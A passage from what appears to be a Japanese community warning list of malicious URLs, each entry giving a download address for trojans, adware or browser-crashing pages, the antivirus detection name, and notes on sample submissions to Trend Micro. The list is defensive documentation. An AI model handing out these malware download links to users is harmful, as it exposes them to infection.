    「時間帯によってブラクラに繋がる危険URLです。今現在は繋がりませんでした。繋がるときは繋がるようなので踏まないほうがいいでしょう。
    漏れの環境では telnetストーム&アンチドートで Trojan.JS.NoClose 検出のブラクラです。
    Trojan.JS.NoClose は you are an idiot などの窓増殖系ブラクラで検出されやすい物なので一時キャッシュ削除後他に何も検出されず。PCの挙動が変になっていなければ大丈夫だと思います。」


  421. http://avtodesk.biz/images/.../video-nude-anjelia.avi.exe
    [2008/10/23]2重拡張子。ウィルス名:TROJ_RENOS.ACO


  422. http://avzhan.3322.org:81/1.exe
    [2008/11/27]ウィルス名:TROJ_SPAMBOT.AS


  423. http://awbeta.net-nucleus.com/FIX/WinATS.cab
    [2006/08/02]2006/07/22 にDL+解凍して現れた「WinATS.dll」ファイルをトレンドマイクロ社に提出。
    2006/07/26 に返事があり、それは以下。
    「弊社では現在のパターンファイル以降にて、ウイルス名:ADW_MIRAR.G として検出するよう対応する予定となりますので、アップデートをお待ちくださいますようお願いいたします。」
    2006/07/26 の時点ではバスター無反応であった。
    しかし、今日、改めてファイルをDLしてみると、ウィルス名:ADW_MIRAR.G を検出することを確認。


  424. http://awm.picengine.com/
    [2005/09/13]海外アダルトサイト。ブラクラ並に色々なアダルトサイトが開いていく。
    開いたURLでは、ウィルス名:JAVA_BYTEVER.Aを検出するものや、怪しげなソフトのインストールを開始するものもある。


  425. http://awm.picengine.com/?cgi-bin/gx/flash.memberid.swf
    [2005/09/16]フラッシュでなくhtmlページ。 海外アダルトサイトがブラクラ的に開く。
    バスター2005が反応したサイトもあるらしいが、私の環境では確認出来なかった。
    他の方の結果は以下の「」内。
    「Young Teens BBSという海外アダルトサイトが表示されましたが、ブラクラ並みにポップアップが出現。タスクマネージャで脱出後、IEのキャッシュをAntidoteでスキャンすると、
    Trojan-Clicker.JS.Linker.c+Exploit.HTML.Mht+Exploit.Java.ByteVerify+Trojan-Downloader.Java.OpenConnection.aaを検出。」
    「フラッシュと見せかけて別サイトへ飛ばす仕掛けがありました。ポップアップブロックをしてないとブラクラ並みに開いてえらいことになります。」
    [2005/09/24]再確認。何回か確認すると、ポプアプが3枚程度で終わる時もある。しかし、ブラクラ並に開く時もある。
    どうやら、呼んでくるサイトがポプアプの開く途中からランダムで、それにより、症状が変わるらしい。
    PC環境でポプアプ遮断だと、無害で終わると思われる。
    [2006/01/24]他の方の結果では、
    「洋エロサイトに逝きます。リンク先クリックでKaspersky反応あり。Trojan-Downloader.JS.Psyme.bo 検出。」


  426. http://ax.180solutions.com/Installer/180SAInstaller.cab
    [2006/07/24]ウィルス名:PE_Generic


  427. http://ax.180solutions.com/installers/5093/easymessengerax.CAB
    [2006/08/03]2006/07/26 にトレンドマイクロ社にDL+解凍して現れた「easymessengerax.dll」ファイルを提出。
    今日、その結果の連絡があり、ウィルス名:ADW_SOLU180.AL として検出するよう対応とのこと。
    当該URLからファイルをDLしてウィルス名:ADW_SOLU180.AL を検出することを確認。


  428. http://axcab.wrs.mcboo.com/website.cab
  429. http://axcab.wrs.mcboo.com/website.cab#version=1,0,0,3
    [2008/09/05]DL+解凍すると「website.dll」なるファイルが現れるが、ウィルス名:TROJ_AGENT.RTL を検出。


  430. http://azjatki.pl/out.php?szukaj=1&jo=65&url=partners/317160/index39.html
    [2004/12/13]ウィルス名:JAVA_BYTEVER.A。ウィルス憑きサイトが次々に開いていく。
    しかも「閉じる」ボタンでは閉じれないサイトが多数。場合により、リソース不足に陥る。


  431. http://azu.ifastnet.com/intercept.exe
    [2006/10/03]2006/09/20 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TROJ_VB.BLT として検出するよう対応、とのこと。
    2006/09/20 にDLしたファイルからウィルス名:TROJ_VB.BLT を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_VB.BLT を検出することを確認。


  432. http://azu.ifastnet.com/msbr.exe
    [2006/10/03]2006/09/20 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TROJ_VB.BLS として検出するよう対応、とのこと。
    2006/09/20 にDLしたファイルからウィルス名:TROJ_VB.BLS を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_VB.BLS を検出することを確認。


  433. http://azu.ifastnet.com/msok.exe
    [2006/10/03]2006/09/20 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TROJ_VB.BLR として検出するよう対応、とのこと。
    2006/09/20 にDLしたファイルからウィルス名:TROJ_VB.BLR を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_VB.BLR を検出することを確認。


  434. http://azu.ifastnet.com/winlogon.exe
    [2006/09/20]ウィルス名:BKDR_VB.WR


  435. http://azu.ifastnet.com/winlogon2.exe
    [2006/10/03]2006/09/20 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TSPY_VB.BLU として検出するよう対応、とのこと。
    2006/09/20 にDLしたファイルからウィルス名:TSPY_VB.BLU を検出することを確認。
    しかし、今日改めて当該URLからDLしてみるとバスター無反応。
    恐らく、新しいファイルに随時置き換えられるURLと推測される。